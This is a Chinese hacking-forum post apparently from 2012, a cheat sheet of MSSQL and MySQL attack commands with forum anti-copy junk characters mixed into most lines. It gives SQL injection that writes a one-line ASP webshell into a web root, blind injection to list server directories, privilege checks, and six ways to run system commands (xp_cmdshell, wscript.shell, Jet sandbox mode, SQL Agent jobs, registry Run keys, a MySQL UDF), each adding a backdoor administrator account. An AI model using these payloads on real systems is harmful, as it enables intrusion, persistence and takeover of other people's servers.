找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2968|回复: 0
打印 上一主题 下一主题

mssql实用命令及导出一句话

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:49:59 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
MSSQL语句导出一句话木马
; J5 A% ^; p3 \, ~, N$ }, {首先确定网站的WEB路径$ b7 t8 E( w' t9 F# ^2 A
;create table pcguest(pc char(255));-- //建一个表用作插入一句话木马
1 i$ T% M! ^; W8 |7 N% X4 b' C' W% S2 F, p2 {; C
;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');-- 4 p0 l+ C! O: Q& @+ h! i4 |- I
//将一句话木马插入表中7 n$ O( k. e* `6 E5 R
! ~% |9 M0 u/ z8 T
;execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';--
; Y' J& b: w. O+ M' |//导出一个ASP文件8 }% z/ w! h, f( i1 }9 u

; i! M, X) A5 k: `( ]9 {6 y& C3 s9 t; `. x  q) |6 [" x. f
关于MSSQL列目录7 u: [1 r' |6 [% e/ g) b
;CREATE TABLE pctest(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) //建一个新表- y! i  f- j6 k% o, F) f
Insert pctest exec master..xp_dirtree "d:\app\",1,1 //用xp_dirtree列目录结果导入所建成的表! f* n) b+ _. j' `% E9 P( @

3 q  N1 `* {& c9 u% P. Z. Qand (select Count(1) from [pctest]) between 0 and 99 //判断表中字段数来知道有几个文夹和目录
" L/ H* z9 `+ J4 x( |
; N& t, s& z5 X: o  ~# DAnd (Select Top 1 len(Cast([file] as varchar(8000))+subdirectory) From (Select Top 2 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 0 and 20 //猜解第二个字段$ l$ E7 W6 I7 f6 u
) G% P+ v. w# g2 S
And (Select Top 1 unicode(substring(Cast([file] as varchar(8000))+subdirectory,1,1)) From (Select Top 1 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 30 and 130 //逐一猜解字段名的每位字符
3 \& U5 \8 l/ B$ M- Z- D+ L: u* ]1 C  \

0 _$ B! ]) Q. l4 x5 m数据库版本和权限查看6 Y5 U" T: c& f" m% C9 t
and 1=(select @@VERSION) //查看详细的数据库信息.
% L& F$ [7 }) I, r7 w5 wand 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- //查看权限是不是SA/ R3 {; o5 g1 D: {. I. A
and 1=(SELECT IS_MEMBER('db_owner'));-- //查看权限是不是DB_ONWER  K; |$ `. \( E! K' `. J; N. @
1 j/ {. x+ e# K$ L; f

9 O' v: |- L6 ?* Q1.利用xp_cmdshell执行命令9 d, U# p5 [1 i1 S
exec master..xp_cmdshell 'net user rfire 123456 /add'
6 ~8 {! g: L" Z- a$ \, e3 \exec master..xp_cmdshell 'net localgroup administrators rfire /add'& n/ z2 v. N' d; `. j0 i7 c, [% B
: B. r7 J$ A. j5 C) i! S
恢复xp_cmdshell存储过程0 `& F; n4 ]3 o, L: |
Exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
9 t5 _3 G. M3 T0 u$ \
2 Q6 A% D3 c3 E1 H2 o2 x2 w( A6 ^+ x# \, m- l/ t
2.利用SP_OAcreate和SP_OAMETHOD执行命令
" j& v: @3 }  K3 ]8 S# D在wscript.shell组件存在的情况下以及xp_cmdshell和xplog70.dll都被删除的情况下: n) w& \/ [. ^  Q& E( j6 y
DECLARE @shell INT //建立一个@shell实体/ j+ ^/ r' Z/ x; T3 Y
EXEC SP_OAcreate 'wscript.shell',@shell out //创建OLE对象的实例
7 ^7 y! R- r* |* R3 M: I- UEXEC SP_OAMETHOD @shell,'run',null,'net user rfire 123456 /add' //调用@shell这个实例
  B, _% f: Z# p% [3 `. D$ J; F+ r& U! @) W  t" @9 z% l

& Y* R" o8 L5 V- F) p3.利用沙盒模式
. R1 x% q: p/ e: k. M) x/ A  L先利用xp_regwrite(前提是要求xp_regwrite存在)改注册表,然后用OpenRowSet访问系统自身mdb文件,然后执行SQL语句。6 L- e/ D- l2 ]  l$ _
开启沙盒模式:
. B; t/ B/ s! ]% T: OEXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD',07 f% d; X+ Q) g% C( r

' M2 y6 {- ]5 v5 E: G( n执行命令:& h; E# ^  L3 e; P7 O, h' t
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user rfire 123456 /add")');* q  T! V' }* w6 ]
6 A7 H5 |0 e& B2 z

, V& |& o9 L7 u' h' c& V4 l# @5 g5 d4.利用SQL代理执行命令, l) l5 a( e) N- H% M6 [
EXEC master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT' //使用xp_servicecontrol启动SQLSERVERAGENT服务
+ U* c3 N( H5 m- N, f- r& B* ~9 d% N6 j0 [- d& y8 b. C& \
执行命令:! j3 ~, z% D6 @  {' y2 ~% p1 d$ Z
use msdb exec sp_delete_job null,'x' //进入msdb数据库,删除x作业防止出错' f) `  x; d8 C' W4 `: |
exec sp_add_job 'x'
1 {6 {8 e& q8 P: Uexec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user rfire 123456 /add' //添加作业
% {) ?) S) Y1 L* u/ n5 b) |6 }3 }exec sp_add_jobserver Null,'x',@@servername exec sp_add_job 'x' //启动这个作业
( U. r; G- j9 O: [% R/ ~& y6 s, V5 A. T* g$ i% H
3 A$ ^+ B: ]9 h
5.利用注册表项执行命令(用xp_regwrite将执行命令写入启动项)
8 R$ M2 c. x+ z  f% a! w( ZEXEC master.dbo.xp_regwrite 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run\','shell'.'REG_SZ','C:\windows\system32\cmd.exe /c net user rfire 123456 /add'
3 w( u4 p7 K1 W* ]
& M  c5 ?+ ?$ k. x6 v# ~% c" Q5 H5 ^7 Z
6.MYSQL的命令执行' I0 v# h5 V, d3 ^. m# _* z
MYSQL的UDF自定义函数提权(要求账号拥有insert和delete权限)
/ x: h& S7 `9 ~3 k, X8 ]( c首先要在su.php下导出c:\windows\udf.dll
  K3 t  R( I# B5 S6 e: H导出后执行创建自定义函数命令:5 I& o" l  }2 s' _/ p
Create Function cmdshell returns string soname 'udf.dll'
1 j' |7 Q- }, @  I/ H- v执行命令0 @- J9 b$ j$ n" |7 Q* n
select cmdshell('net user rfire 123456 /add')
9 T. B* [( J! ?! o6 z! ~执行后删除函数 drop function cmdshell3 p3 N  l% z- M+ V% u' e2 T
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表